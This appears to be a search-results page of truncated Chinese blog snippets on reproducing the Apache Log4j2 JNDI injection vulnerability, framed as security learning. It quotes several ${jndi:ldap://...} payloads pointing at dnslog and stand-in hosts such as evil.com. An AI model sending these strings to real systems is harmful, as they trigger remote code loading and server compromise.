二、漏洞复现 2.1 使用DNLOG平台查看回显 可以使用相关的dnslog平台查看，也可以使用burp自带的dnslog进行查看，我这里使用的是 http://dnslog.cn/ ${jndi:ldap://rbmanr.dnslog.cn/exp} 有回显，说明存在该漏洞 ...

今天突然想码字，那就写一下log4j。 一、漏洞简介 1.漏洞原理 Apache Log4j2 中存在JNDI注入漏洞，当程序将用户输入的数据进行日志记录时，即可触发此漏洞，成功利用此漏洞可以在目标服务器上执行任意代码。 通俗简单的说就是：在打印日志的时候，如果你的日志内容中包含 ...

参考链接 https://www.cnblogs.com/xuzhujack/p/15673703.html https://blog.csdn.net/weixin_44309905/artic ...

本次记录自己测试时每一步操作，很详细。 本次复现分为curl测试和拿shell两种操作，测试完curl后体验时长到期了，只能换环境了。 本次测试环境如下： curl------------------------------------------------------ 靶场 ...

0X00-引言 过年了，放炮 这个漏洞真牛逼，日天，日地，日空气 2021年12月10日凌晨，我正坐在马桶上，突然看到厕纸上面出现一串神秘代码${jndi:ldap://kao5b1ig.ns.dns3.cf.} ,我赶紧起身，打开电脑一看，网页dnslog弹出记录，我大惊，紧接 ...

漏洞简介 Apache Log4j 2 是Java语言的日志处理套件，使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞，攻击者在可以控制日志内容的情况下，通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入，执行任意 ...

前言 Log4j2是Java开发常用的日志框架，这次的漏洞是核弹级的，影响范围广，危害大，攻击手段简单，已知可能影响到的相关应用有 Apache Solr Apache Flink Apache Druid Apache Struts2 ...

Apache log4j2 远程代码执行漏洞复现👻 最近爆出的一个Apache log4j2的远程代码执行漏洞听说危害程度极大哈，复现一下看看。 漏洞原理： Apache Log4j2 中存在JNDI注入漏洞，当程序将用户输入的数据进行日志记录时，即可触发此漏洞，成功利用此漏洞可以在目标 ...